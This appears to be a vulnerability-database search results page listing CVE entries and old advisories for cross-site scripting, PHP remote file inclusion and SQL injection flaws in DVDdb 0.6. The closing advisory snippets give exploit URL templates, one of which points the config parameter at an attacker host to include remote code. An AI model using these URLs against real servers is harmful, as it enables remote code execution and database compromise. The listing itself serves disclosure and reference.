16 matches found
EUVD-2007-2492
Malware in sbrugna...
Cross site scripting
Multiple cross-site scripting XSS vulnerabilities in DVDdb 0.6 and earlier allow remote attackers to inject arbitrary web script or HTML via 1 the movieid parameter to loan.php or 2 the s parameter to listmovies.php...
CVE-2007-2499
Multiple cross-site scripting XSS vulnerabilities in DVDdb 0.6 and earlier allow remote attackers to inject arbitrary web script or HTML via 1 the movieid parameter to loan.php or 2 the s parameter to listmovies.php...
CVE-2007-2499
Multiple cross-site scripting XSS vulnerabilities in DVDdb 0.6 and earlier allow remote attackers to inject arbitrary web script or HTML via 1 the movieid parameter to loan.php or 2 the s parameter to listmovies.php...
CVE-2007-2499
CVE-2007-2499 covers multiple XSS flaws in DVDdb 0.6 and earlier. The vulnerabilities allow remote attackers to inject arbitrary script/HTML through (1) the movieid parameter in loan.php and (2) the s parameter in listmovies.php. The NVD entry provides a base score of 6.8 (MEDIUM) with NETWORK at...
DVDdb XSS vuln.
DVDdb XSS vuln. Vuln. discovered by : r0t Date: 2 May 2007 vendor:http://globalmegacorp.org/dvddb/ affected versions: 0.6 and previous orginal advisory:http://pridels.blogspot.com/2007/05/dvddb-xss-vuln.html DVDdb contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to t...
Remote file inclusion
PHP remote file inclusion vulnerability in inc/common.php in GlobalMegaCorp dvddb 0.6 allows remote attackers to execute arbitrary PHP code via a URL in the config parameter...
Sql injection
SQL injection vulnerability in inc/common.php in GlobalMegaCorp dvddb 0.6 allows remote attackers to execute arbitrary SQL commands via the user parameter. NOTE: this issue has been disputed by a reliable third party, who states that inc/common.php only contains function definitions...
CVE-2007-0793
PHP remote file inclusion vulnerability in inc/common.php in GlobalMegaCorp dvddb 0.6 allows remote attackers to execute arbitrary PHP code via a URL in the config parameter...
CVE-2007-0794
SQL injection vulnerability in inc/common.php in GlobalMegaCorp dvddb 0.6 allows remote attackers to execute arbitrary SQL commands via the user parameter. NOTE: this issue has been disputed by a reliable third party, who states that inc/common.php only contains function definitions...
CVE-2007-0793
PHP remote file inclusion vulnerability in inc/common.php in GlobalMegaCorp dvddb 0.6 allows remote attackers to execute arbitrary PHP code via a URL in the config parameter...
CVE-2007-0794
CVE-2007-0794 describes a SQL injection vulnerability in GlobalMegaCorp dvddb 0.6, specifically in inc/common.php via the user parameter, potentially allowing remote arbitrary SQL execution. Some sources note the issue is disputed and that the file may contain only function definitions. Connected...
CVE-2007-0793
CVE-2007-0793 describes a PHP remote file inclusion vulnerability in inc/common.php of GlobalMegaCorp dvddb 0.6, allowing remote attackers to execute arbitrary PHP code via a URL supplied in the config parameter. The affected component is the dvddb app’s common.php handling of config paths; root ...
dvddb06-rfi.txt
Title : dvddb-0.6 media remote file include vuln. Author : Blaster Download : http://globalmegacorp.org/dvddb/dvddb-0.6.zip Contact : [email protected] Vuln Code: require$config /"themes"; ExpLoit : http://target/path/inc/common.php?config=attacker GreetZ: BLaCKWHITE, HackerBox.Eu...
dvddb-0.6 media remote file include vuln.
Title : dvddb-0.6 media remote file include vuln. Author : Blaster Download : http://globalmegacorp.org/dvddb/dvddb-0.6.zip Contact : [email protected] Vuln Code: require$config /"themes"; ExpLoit : http://target/path/inc/common.php?config=attacker GreetZ: BLaCKWHITE, HackerBox.Eu...
dvddb-0.6 media sql-inj. vuln.
Title : dvddb-0.6 media sql-inj. vuln. Author : Blaster Download : http://globalmegacorp.org/dvddb/dvddb-0.6.zip Contact : [email protected] ExpLoit : http://target/path/inc/common.php?user=sql GreetZ: BLaCKWHITE, HackerBox.Eu...